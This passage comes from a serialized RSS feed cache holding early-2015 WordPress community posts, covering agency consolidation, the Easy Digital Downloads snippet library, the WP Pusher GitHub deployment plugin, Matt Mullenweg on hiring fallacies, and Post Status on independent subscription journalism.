WordCamp Europe in Sofia, Bulgaria which helped to confirm this was the right decision to make.</p></blockquote>\n<p>Earlier this year at PressNomics, one of the topics of discussion is that we&#8217;re at the beginning stages of a consolidation period for agencies in the WordPress space. This move solidifies the belief that acquisitions involving 10 employees or less appear likely as larger shops look for opportunities to expand their reach and acquire talent at the same time.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 03 Feb 2015 22:11:05 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Jeff Chandler\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:18;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:84:\"WPTavern: How a Crowdsourced Code Snippet Library Can Boost Your Open Source Project\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=37151\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:94:\"http://wptavern.com/how-a-crowdsourced-code-snippet-library-can-boost-your-open-source-project\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:4387:\"<p>Roughly one year ago this month Pippin Williamson made the first commit to Easy Digital Download&#8217;s &#8220;<a href=\"https://github.com/easydigitaldownloads/library\" target=\"_blank\">Library</a>&#8221; repository on GitHub. He created the library to be a community-maintained repository of code snippets that modify the default behavior of Easy Digital Downloads.</p>\n<p>So far the library has received 113 commits from eight contributors, which has resulted in more than sixty code snippets available to users and developers. The snippets cover everything from modifying the checkout experience to customizing the plugin&#8217;s email notifications.</p>\n<p><a href=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/02/edd-code-snippet-library.png\" rel=\"prettyphoto[37151]\"><img src=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/02/edd-code-snippet-library.png?resize=1025%2C951\" alt=\"edd-code-snippet-library\" class=\"aligncenter size-full wp-image-38381\" /></a></p>\n<p>With more than half a million downloads on <a href=\"https://wordpress.org/plugins/easy-digital-downloads/\" target=\"_blank\">WordPress.org</a> and 150+ free and commercial <a href=\"https://easydigitaldownloads.com/extensions/\" target=\"_blank\">extensions</a>, Easy Digital Downloads has a large community of developers who work with the software every day.</p>\n<p>Williamson said that having the ability to share snippets for modifying EDD behavior has been hugely useful for the project. He only approves solid, tested code but in most cases the snippets have been submitted by the EDD team. Managing the repository hardly costs any time at all, &#8220;a few minutes per week at max,&#8221; he said.</p>\n<p>The benefits of hosting a community-maintained repository of code snippets far outweigh the minimal time required to maintain it. &#8220;The biggest problem it has is humans: we tend to forget to put snippets up a lot of times,&#8221; Williamson said. He identified three key areas where the library benefits the project:</p>\n<ul>\n<li>It&#8217;s a resource for the support team.</li>\n<li>It&#8217;s a source of examples for people wanting to customize behavior.</li>\n<li>It provides live testing (similar to add-on plugins) for potential features to add to core.</li>\n</ul>\n<p>The most common way that snippets are added to the EDD library is through the support staff.  &#8220;We write code snippets for customers while helping with support tickets and then we put the snippet in the library,&#8221; Williamson said.</p>\n<p>He hasn&#8217;t seen any WordPress-based open source projects or products doing anything similar but thinks that others could gain some value from implementing a library. GenerateWP might be the closest example of a site attempting something similar for snippets that extend WordPress core, with its new user <a href=\"http://wptavern.com/generatewp-introduces-wordpress-custom-code-snippets\" target=\"_blank\">code library feature</a>. However, this doesn&#8217;t have the collaborative benefits of hosting the library on GitHub.</p>\n<p>Larger WordPress projects like the Pods Framework, Gravity Forms, WooCommerce, BuddyPress, Jetpack, etc., are prime candidates that might benefit from a library of tested snippets. Of course, it helps that the base EDD plugin is free and open source. A 100% commercial project may not fare as well with a crowdsourced snippet library.</p>\n<p>Easy Digital Download is well known for being extensible and developer-friendly. Over the past two years <a href=\"http://wptavern.com/pippin-williamson-on-building-a-community-around-your-open-source-project\" target=\"_blank\">Williamson built a community of contributors</a> 120+ strong and found that extensibility has a direct correlation to profitability. The code snippet library is undoubtedly a valuable investment toward helping developers extend the base EDD plugin.</p>\n<p>Could your open source project or product benefit from a community-maintained library of code snippets? A snippet library can keep developers from having to reinvent the wheel when performing common modifications. It also provides a tested resource of code samples for those who are just getting started extending your project. If Williamson&#8217;s experience is any proof, then the few minutes per week spent on a snippets library can pay off with a big boost for the community surrounding your project.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 03 Feb 2015 20:12:31 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:19;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:26:\"Matt: Advice and Fallacies\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:21:\"http://ma.tt/?p=44648\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:42:\"http://ma.tt/2015/02/advice-and-fallacies/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:5955:\"<p>One of the toughest things in business is when you get well-meaning advice from advisors, investors, or friends of the company who are valuable but might hold some ideas or ways of approaching problems that just aren&#8217;t applicable to your particular company or situation. They might be right most of the time, and it might have worked for them in the past to build a huge success, but it doesn&#8217;t mean it&#8217;s right for you, right now.</p>\n<p>This is especially a struggle for Automattic because so much of what we do is deliberately different from companies that have come before us. The below is a sensitive-info-scrubbed version of a comment I made on an <a href=\"http://p2theme.com/\">internal P2</a> in response to someone who had met with a close friend of the company who had said we should &#8220;hire more business people, and more people like <em>so-and-so</em>, who have a background in and passion for data analysis and structure. He also shared his ideas about what the additional business hires could be responsible for, such as P&amp;L responsibilities for specific products.&#8221; The person he had talked to was asking why we weren&#8217;t following that advice.</p>\n<p>The first part was easy, because <em>so-and-so</em> was actually leading hiring for a position around data and the early results were going well. The rest I ended up writing more about, which follows. It was only meant for internal consumption, so read it as such, but I got enough requests to share the comment publicly that I wanted to clean it up and release it for y&#8217;all.</p>\n<blockquote><p>On the &#8220;more biz people + P&amp;L&#8221; side, it&#8217;s an area we disagree.</p>\n<p>We&#8217;ve had more &#8220;business people&#8221; in the past, and found it just didn&#8217;t move the needle in the same way that investing on the support, engineering, and design side did. They also tended to generate more meetings and work for other people than was commensurate for their contributions.</p>\n<p>We&#8217;ve also experimented with giving leads P&amp;L responsibility for products and groups, but ultimately it was awkward because we don&#8217;t really want leads or teams focused on the loss or costs of what they&#8217;re doing &#8212; we just want to grow our core metrics and revenue in a healthy and accelerating way, and let Ops and myself worry about overall profit or loss for the company, costs of people and services, capital requirements, etc. We&#8217;re still at a stage where our primary goals are investing in growth and product excellence, I wouldn&#8217;t want a P&amp;L concern to be a distraction from that, and that also takes us into the territory of different teams having &#8220;headcounts&#8221; of people they can hire for the year, or budgets set ahead of time and that they&#8217;ll lose if they don&#8217;t use, zero-sum accounting between teams and more balkanization you often see in larger organizations. When anyone thinks about P&amp;L at Automattic, I want it to be holistically and with a long-term view, not for a single team or product.</p>\n<p>It gets backs to the fallacy we talked about and agreed to avoid at the [WordPress.com leads] meetup, which is the business equivalent of <a href=\"http://en.wikipedia.org/wiki/Great_Man_theory\" rel=\"nofollow\">Great Man Theory</a>: the idea that a deficiency in the business or product will be solved by hiring someone senior to be in charge of that thing. Example: Automattic is bad at marketing, we should hire a CMO. (99% of the time when this is suggested it means an external person, because if anyone internal was good the problem wouldn&#8217;t exist.) It&#8217;s an easy thing for anyone to fall into, you can see it in [a recent internal thread].</p>\n<p>This must work sometimes, because it seems to be a near-universal affliction of VCs on startup boards. It also is a little bit of a <a href=\"http://bikeshed.com/\" rel=\"nofollow\">bikeshed</a>, because while it can be difficult to understand or feel like you can have an influence on something fundamental to the product, like say the signup flow, most VCs have large professional networks and can have long and vigorous discussions talking about potential people who are executives in a given area and their first or second degree connections to them. Of course, like many of us, VCs are consumers of tech media which tends to ascribe all the success of an organization to a single person (like Sheryl Sandberg for Facebook not falling apart, or Adam Bain for revenue at Twitter). However often the problem has root causes more fundamental than a single person could shift.</p>\n<p>I subscribe to a more environment-driven approach, that if you break down a problem into its component parts you can address them individually, often with relatively simple next steps, and build things from the ground up, rather than the top down. If you can&#8217;t do that, then it&#8217;s best to be candid that the area is not a priority and make sure that&#8217;s in line with what you&#8217;re focusing on instead. In this process leaders will emerge or if the effort matures to a point where one joins as a new hire he or she will have the resources, groundwork, and environment to succeed.</p></blockquote>\n<p><strong>So in summary: always go back to first principles of decisions.</strong> Hires are seldom panaceas. Someone being successful in a role at another company doesn&#8217;t mean they actually did the work, or were the cause of the success. If there&#8217;s an area you&#8217;re weak, try to figure out the root causes of why you&#8217;re weak, and where possible try to improve the environment that creates the problem before pinning the turnaround on a &#8220;Jesus hire.&#8221; When you improve the environment it makes it much more likely a new external hire will do well. The majority of success or failure is a result of the environment, at least as much as the individuals involved.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 03 Feb 2015 07:57:22 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"Matt\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:20;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:100:\"WPTavern: WP Pusher Aims to Provide Pain-Free Deployment of WordPress Themes and Plugins from GitHub\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=38339\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:110:\"http://wptavern.com/wp-pusher-aims-to-provide-pain-free-deployment-of-wordpress-themes-and-plugins-from-github\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:6728:\"<p><a href=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/02/wp-pusher.png\" rel=\"prettyphoto[38339]\"><img src=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/02/wp-pusher.png?resize=680%2C312\" alt=\"wp-pusher\" class=\"aligncenter size-full wp-image-38342\" /></a></p>\n<p>If you create plugins and themes for clients and host them on GitHub, then you may have encountered the hassle of having to move those files over to your client&#8217;s installation. On super cheap hosting packages, where SSH access is not an option, this process inevitably requires manually copying files over via FTP.</p>\n<p>This is the problem that Danish developer <a href=\"http://petersuhm.com/\" target=\"_blank\">Peter Suhm</a> aims to solve with his new <a href=\"https://wppusher.com/\" target=\"_blank\">WP Pusher</a> product. The plugin aims to bring pain-free deployment of WordPress themes and plugins directly from GitHub and Bitbucket.</p>\n<p>&#8220;If you happen to be an actual developer, I guess you have a few preferences as to how you manage and deploy your code,&#8221; Suhm said. &#8220;I’m talking about stuff like version control and automated deployment scripts. Good luck with that on your clients&#8217; cheap-ass shared hosting account.&#8221;</p>\n<p>Suhm developed WP Pusher with the vast majority of cheaply-hosted WordPress sites in mind. Additionally, he wanted to eliminate some of the hangups with more expensive hosts. &#8220;Even if you are running a shiny new VPS and have SSH access, Git installed and you think all is well, soon you’ll realize other weird things,&#8221; he said. &#8220;You can&#8217;t have symlinks in your /plugins folder just to mention one.&#8221; WP Pusher gets around these limitations via a simple plugin that does not require Git or SSH.</p>\n<h3>How Does WP Pusher Work?</h3>\n<p>Once installed, WP Pusher allows you to install and manage all of your GitHub or Bitbucket-hosted plugins in one central dashboard in the admin. Enabling the Push-to-Deploy feature will have your code update itself automatically every time you push to GitHub or Bitbucket.</p>\n<p><a href=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/02/manage-wp-pusher-themes.png\" rel=\"prettyphoto[38339]\"><img src=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/02/manage-wp-pusher-themes.png?resize=1025%2C202\" alt=\"manage-wp-pusher-themes\" class=\"aligncenter size-full wp-image-38352\" /></a></p>\n<p>The plugin supports private repositories in its free edition and includes support for branches in the <a href=\"https://wppusher.com/#licenses\" target=\"_blank\">Pro version</a>.</p>\n<p><a href=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/02/wp-pusher-install-plugin.png\" rel=\"prettyphoto[38339]\"><img src=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/02/wp-pusher-install-plugin.png?resize=1025%2C651\" alt=\"wp-pusher-install-plugin\" class=\"aligncenter size-full wp-image-38353\" /></a></p>\n<p>WP Pusher is essentially an extension of the built-in auto updater in WordPress, which Suhm explained in the plugin&#8217;s release <a href=\"http://blog.wppusher.com/pain-of-wordpress-development/\" target=\"_blank\">post</a>:</p>\n<blockquote><p>After a lot of prototyping, and hacking around with the WordPress core, we came up with a smart solution. By utilizing the WordPress core upgrader classes, we could solve the problem in a really clean way. </p>\n<p>Since WordPress already knows how to pull stuff from a remote source and install it, we realized that by working together with WordPress, instead of just throwing random automated SSH and FTP scripts at the server, we could just have WordPress do the work for us -with a lot of tweaking of course. In the end, our solution doesn&#8217;t do anything that is not native to WordPress. It’s all core functionality.</p></blockquote>\n<p>WP Pusher does everything in the plugin and does not require shell access. It communicates with GitHub via a token stored on your server and operates using WordPress&#8217; core updater capabilities.</p>\n<h3>Different Approaches to Managing WordPress Projects with Git</h3>\n<p>In order to use WP Pusher, each GitHub-hosted plugin and/or theme will need to be in its own repository. While beta testing WP Pusher, Suhm found that developers have <a href=\"http://blog.wppusher.com/managing-wordpress-projects-with-git/\" target=\"_blank\">differences in how they manage WordPress projects with Git</a>. The most common one he&#8217;s encountered is <em>one installation, one repository</em>, where the entire WordPress installation, including themes and plugins, is under Git control. Suhm believes that this approach is fundamentally broken, given that it requires you to keep a lot of 3rd party code under version control.</p>\n<p>WP Pusher operates under a &#8220;<em>one package, one repository</em>&#8221; approach where each theme or plugin is its own entity. This method also offers the advantage of being able to share theme/plugin code across multiple projects.</p>\n<p>&#8220;WordPress relies heavily on the auto updater, which would make your version control a mess,&#8221; Suhm explained. &#8220;If you do have something that is more enterprise than most WordPress setups, you should consider a custom setup that allows better for version control of core. Packages should still, in my opinion, each have their own repositories, since they are logically their own entities.&#8221;</p>\n<p>WP Pusher is structured around this approach for managing WordPress projects with Git. You may need to restructure some of your repositories if you want to be able to use the plugin.</p>\n<p>The free version offers unlimited themes and plugins, unlimited repositories, and support for both GitHub and Bitbucket. It does not, however, include email support. WP Pusher is compatible with WordPress multisite and will show up in the network admin when activated. It doesn&#8217;t currently support Composer but Suhm is <a href=\"https://twitter.com/WP_Pusher/status/558356082960371713\" target=\"_blank\">considering adding it in the future</a>. The plugin is released under the GPLv2 license.</p>\n<p><a href=\"https://wppusher.com/\" target=\"_blank\">WP Pusher</a> offers a unique take on maintaining version control for projects while not forcing WordPress to bend over backwards to provide it in the admin. It leaves the version control to GitHub and/or Bitbucket and uses WordPress simply for deployment.</p>\n<p>Setup is simple and the plugin will work virtually everywhere, even on the cheapest hosting. If you like the idea of maintaining version control on a plugin/theme basis, you can download the WP Pusher plugin for free from the project&#8217;s <a href=\"https://wppusher.com/\" target=\"_blank\">website</a>.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 02 Feb 2015 22:32:21 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:21;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:27:\"Post Status: New journalism\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:30:\"https://poststatus.com/?p=8311\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:38:\"https://poststatus.com/new-journalism/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:13584:\"<p>Have you heard of Andrew Sullivan? He&#8217;s the man behind The Dish &#8212; a blog that helped break new ground on blog monetization through membership fees.</p>\n<p><a href=\"http://dish.andrewsullivan.com/2015/01/31/a-note-to-my-readers/\">He quit blogging</a>, and therefore the media world declared blogging dead (again). Sullivan leaving and the posts that have come from it have caused me to think about blogging and journalism in its current and changing state. I think we&#8217;re in the second act of what I&#8217;m pompously calling <em>new journalism</em>.</p>\n<h3>Blogging is so (not) dead</h3>\n<p>Seemingly everyone in media weighed in on Sullivan&#8217;s departure, from <a href=\"http://www.buzzfeed.com/bensmith/this-is-my-blog\">Ben Smith</a> at Buzzfeed to <a href=\"http://www.vox.com/2015/1/30/7948091/andrew-sullivan-leaving-blogging\">Ezra Klein</a> at Vox. My favorite (until today) was Mathew Ingram&#8217;s <a href=\"https://gigaom.com/2015/01/31/blogging-is-very-much-alive-we-just-call-it-something-else-now/\">take at Gigaom</a>, which mostly defended the blog.</p>\n<p>But the best of the bunch goes to former Automattician and current independent tech journalist Ben Thompson. Ben runs <a href=\"http://stratechery.com/\">Stratechery</a>, a blog that has a very similar model to The Dish (and my own), where he makes money from subscribers who get extra members-only content.</p>\n<p>I have followed Ben&#8217;s work closely. I was quite keen to see how his model would work for him, and it has. Nevertheless, I almost fully agree with Ben&#8217;s take on what Sullivan&#8217;s model and departure mean:</p>\n<blockquote><p>It turns out, though, that there are more business models than simply advertising, as Sullivan himself sought to show. Sullivan was, for the last two years, supported by reader subscriptions to the tune of <a href=\"https://gigaom.com/2014/10/10/andrew-sullivans-daily-dish-sees-new-signups-fall-but-revenue-holding-steady-at-about-1m/\">nearly one million dollars a year</a>, and while many were skeptical of Sullivan’s efforts when he started, his ability to raise money shouldn’t have been a surprise: his is a singular voice – to put it in economic terms, Sullivan’s writing had a low <a href=\"http://en.wikipedia.org/wiki/Elasticity_of_substitution\">elasticity of substitution</a> – so people were happy to pay for something they couldn’t get anywhere else.</p></blockquote>\n<p>Elasticity of substitution may be my new favorite phrase. And in that concept, I think we find the important key to viability. What are we valuing in websites? For me, it&#8217;s individual voices.</p>\n<p>A bit more from Ben&#8217;s post:</p>\n<blockquote><p>But Sullivan did have a viable business, and it scaled wonderfully: it cost him the same amount of both time and money to serve 1,000 subscribers as it would have to serve 100,000, or 1 million, and he didn’t need to change a thing about himself or his content to do it. No, it’s not scale that is the problem, but rather <em>reach.</em></p>\n<p>I am, of course, acutely aware that there is a tradeoff when it comes to the subscription business model: by making something scarce, and worth paying for, you are by definition limiting your number of readers.<span> </span>Stratechery, though, serves a niche, and <a href=\"http://stratechery.com/2015/niches-problem-subscription-services/\">niches are best served</a> by making more from customers who really care than from milking pennies from everyone.</p></blockquote>\n<p>For a writer, it is a difficult mind-shift to focus on subscribers after years of focusing on reach. But I do think a subscriber model, or more likely a hybrid subscriber model, is perhaps one of the most viable routes for sustainable journalism that we have today.</p>\n<h3>New blogging mediums</h3>\n<p>Of additional interest to all of these &#8220;blogging is dead&#8221; posts, is how the writers define blogs and the mediums for them.</p>\n<p>Ben really narrows the definition of a blog.</p>\n<blockquote><p>A big problem with this entire discussion is that there really isn’t a widely agreed-upon definition of what a blog is, thanks in part to the rise of sites like TechCrunch that ran on WordPress and presented posts in reverse-chronological order and so, at least in the beginning, were called “blogs”; add to that the thinly-disguised PR-channels known as “company blogs” and it’s easy to get confused.</p>\n<p>And so, to be clear, when I speak of the “blog” I am referring to a regularly-updated site that is owned-and-operated by an individual (there is, of course, the “group blog,” but it too has a clearly-defined set of authors). And there, in that definition, is the reason why, despite the great unbundling, the blog has not and will not die: is is the only communications tool, in contrast to every other social service, that is <em>owned</em> by the author; to say someone follows a blog is to say someone follows a <em>person.</em></p></blockquote>\n<p>This is probably the single argument I (partially) disagree with. I actually believe that a blog is just that: <em>a web log</em>. I think it&#8217;s perfectly fine to consider Twitter, Facebook, &amp; Instagram new mediums for blogging &#8212; at least in the sense of the traditional <em>web log</em> definition. They are just for a different form of blogging: short form, temporary, and a viable replacement for the &#8220;10 to 15&#8243; daily update style of posts many old school bloggers previously put on their primary &#8220;blogs&#8221;.</p>\n<p>Other than someone abusing these mediums &#8212; for instance, Marc Andreessen&#8217;s tweet-storms &#8212; our WordPress (or other software) blogs are still where our more permanent thoughts go. And fortunately, as Ben notes, we have these short-form mediums as free marketing channels for our actual blogs and more serious thoughts.</p>\n<p>Ben also hesitates to consider multi-author sites as blogs. I disagree here as well. Perhaps publications aren&#8217;t blogs as a whole, but within TechCrunch or The New York Times, individuals rise up with their own unique voices, and those singular feeds are, in my opinion, blogs of their own &#8212; whether or not they are fully siloed within the publication. I can follow an author on Twitter and essentially get their blog feed through their Twitter links, even if the site itself doesn&#8217;t differentiate their posts from anyone else&#8217;s.</p>\n<p>So Ben has helped me establish a new mental constraint for defining a blog: <strong>a blog is a highly individual thing</strong>. I have never truly considered this before, but it makes sense. I&#8217;ve always been most attracted to publications where the voice behind the writing is strong &#8212; where I know who is writing a post whether I see the byline or not.</p>\n<h3>Publishing containers</h3>\n<p>The New York Times, TechCrunch, Politico and BuzzFeed: these are containers. They may have some over-arching styles that most of their writers follow, but we still get to know individuals in these publications. I know David Carr&#8217;s voice at The New York Times; I know Alexia Tsotsis&#8217; voice at TechCrunch; I know Mike Allen&#8217;s voice at Politico; and I know Ben Smith&#8217;s voice at BuzzFeed.</p>\n<p>One thing we&#8217;ve seen happen in a wake of <em>new journalism</em> is that a voice gets too big for the container, and the voice splits. Nate Silver left The New York Times. Ezra Klein left The Washington Post. Interestingly, I think both of these guys lost their voices a bit when they created their own containers.</p>\n<p>Andrew Sullivan is a great example of a big voice within publishing containers. Before he went independent, he was a huge voice at The Atlantic and The Daily Beast. He was apparently responsible for <a href=\"http://www.forbes.com/sites/jeffbercovici/2011/05/03/losing-andrew-sullivan-didnt-hurt-the-atlantics-traffic/\">up to a quarter</a> of all traffic to The Atlantic before he left.</p>\n<p>For a publisher, this should be both exhilarating and terrifying. The voice within your publication (Sullivan) gets outstanding results, but you also run the risk of the voice leaving; if the voice is bigger than the container, that could be really really bad.</p>\n<h3>We need new tools for a new kind of publishing container</h3>\n<p>Journalists are leaving big publishing containers and going independent for a variety of reasons, but I believe one is pretty clear: money.</p>\n<p>A niche publisher like Ben Thompson can make well into six-figures running his own publication. Ben is a talented and knowledgeable writer, but I don&#8217;t think it would be easy for him to make the kind of money he&#8217;s making at Stratechery if he were writing for a traditional publication.</p>\n<p>Ben cites the ease of use of tools like WordPress and Stripe as reasons to be optimistic that the independent subscription model can work:</p>\n<blockquote><p>While WordPress has long been an effective free option for managing the content-side of blogging, only recently are there useful tools for managing the business-side. First and foremost amongst these is Stripe which, for the first time makes managing subscription-payments simple and straight-forward. However, there are still holes, particularly when it comes to actually managing membership lists and communities</p></blockquote>\n<p>I agree that it&#8217;s easier than before, but I wouldn&#8217;t say it&#8217;s simple. I&#8217;ve spent a great deal of time to make Post Status work behind the scenes, and I don&#8217;t think it&#8217;s perfect by any means. Is it cheap compared to million dollar big-publisher platforms? Yes. Is it cheap for a solo-journalist? Not at all.</p>\n<p>I think there is a tremendous opportunity here: there is room to create new publishing containers (I&#8217;m not sure if this should be a tool or a network) that lower the technical barrier to entry but also enable independent, subscription-based journalism.</p>\n<p>Big media companies remove the need to manage the business and technical side for journalists. Meanwhile, those of us that are attempting our own thing are all reinventing the wheel a bit.</p>\n<p>Ben and I use some of the same tools &#8212; WordPress and Stripe &#8212; but what if there was a more structured container for those seeking independence and someone to help them take care of the non-content aspects? What if that same tool had its own network effect?</p>\n<h3>Who is in position to be a new kind of container?</h3>\n<p>What existing networks are in position to offer this kind of tool? WordPress.com is one. Medium is another.</p>\n<p>I envision a tool (publishing platform) where independent journalists can do a few things:</p>\n<ul>\n<li>Maintain their own audience (be a part of a network, but be their own voice and publication)</li>\n<li>Own their own brand (custom themes/styles, unique domain)</li>\n<li>Offer subscription options to readers without managing the tech</li>\n</ul>\n<p>If I were Ev Williams or Matt Mullenweg, I&#8217;d be working on a way to be the next container for great, <em>sustainable</em> journalism. And hosted networks have a unique advantage: they can offer discovery for new or lesser-known authors. Unless <a href=\"https://poststatus.com/notes/recommendation-engine-independent-wordpress-blogs/\">self-hosted options figure that part out</a>.</p>\n<p>As a publisher on the WordPress.org side of things, I don&#8217;t think the perfect tool exists yet either. Fortunately I&#8217;m able to build most of what I need. But Ben is right that managing membership lists  and communities with WordPress is still hard. Syncing the membership list and the email list (delivery mechanism) is hard too.</p>\n<p>While I don&#8217;t think the perfect self-hosted tools exist quite yet, I believe it&#8217;s just a matter of time. But even the best self-hosted tool will require that the journalist also manage the business elements; therefore I think there will always be room for a hosted tool.</p>\n<p>I think this could be an excellent business vertical for a publishing tool like <a href=\"http://wordpress.com\">WordPress.com</a> or <a href=\"http://medium.com\">Medium</a>.</p>\n<h3>New journalism</h3>\n<p>I&#8217;ve used the words <em>journalism</em> and <em>blogging</em> synonymously throughout this post. I don&#8217;t think all bloggers are journalists, but I do think all journalists are bloggers. Blogging isn&#8217;t dead. I think it&#8217;s just leaving adolescence.</p>\n<p>Journalists won&#8217;t need big media to back their efforts. They&#8217;ll be able to use a blend of mediums (Twitter, Instagram, Youtube, etc) to funnel traffic to their main &#8220;blog&#8221; &#8212; or primary domain &#8212; where they can 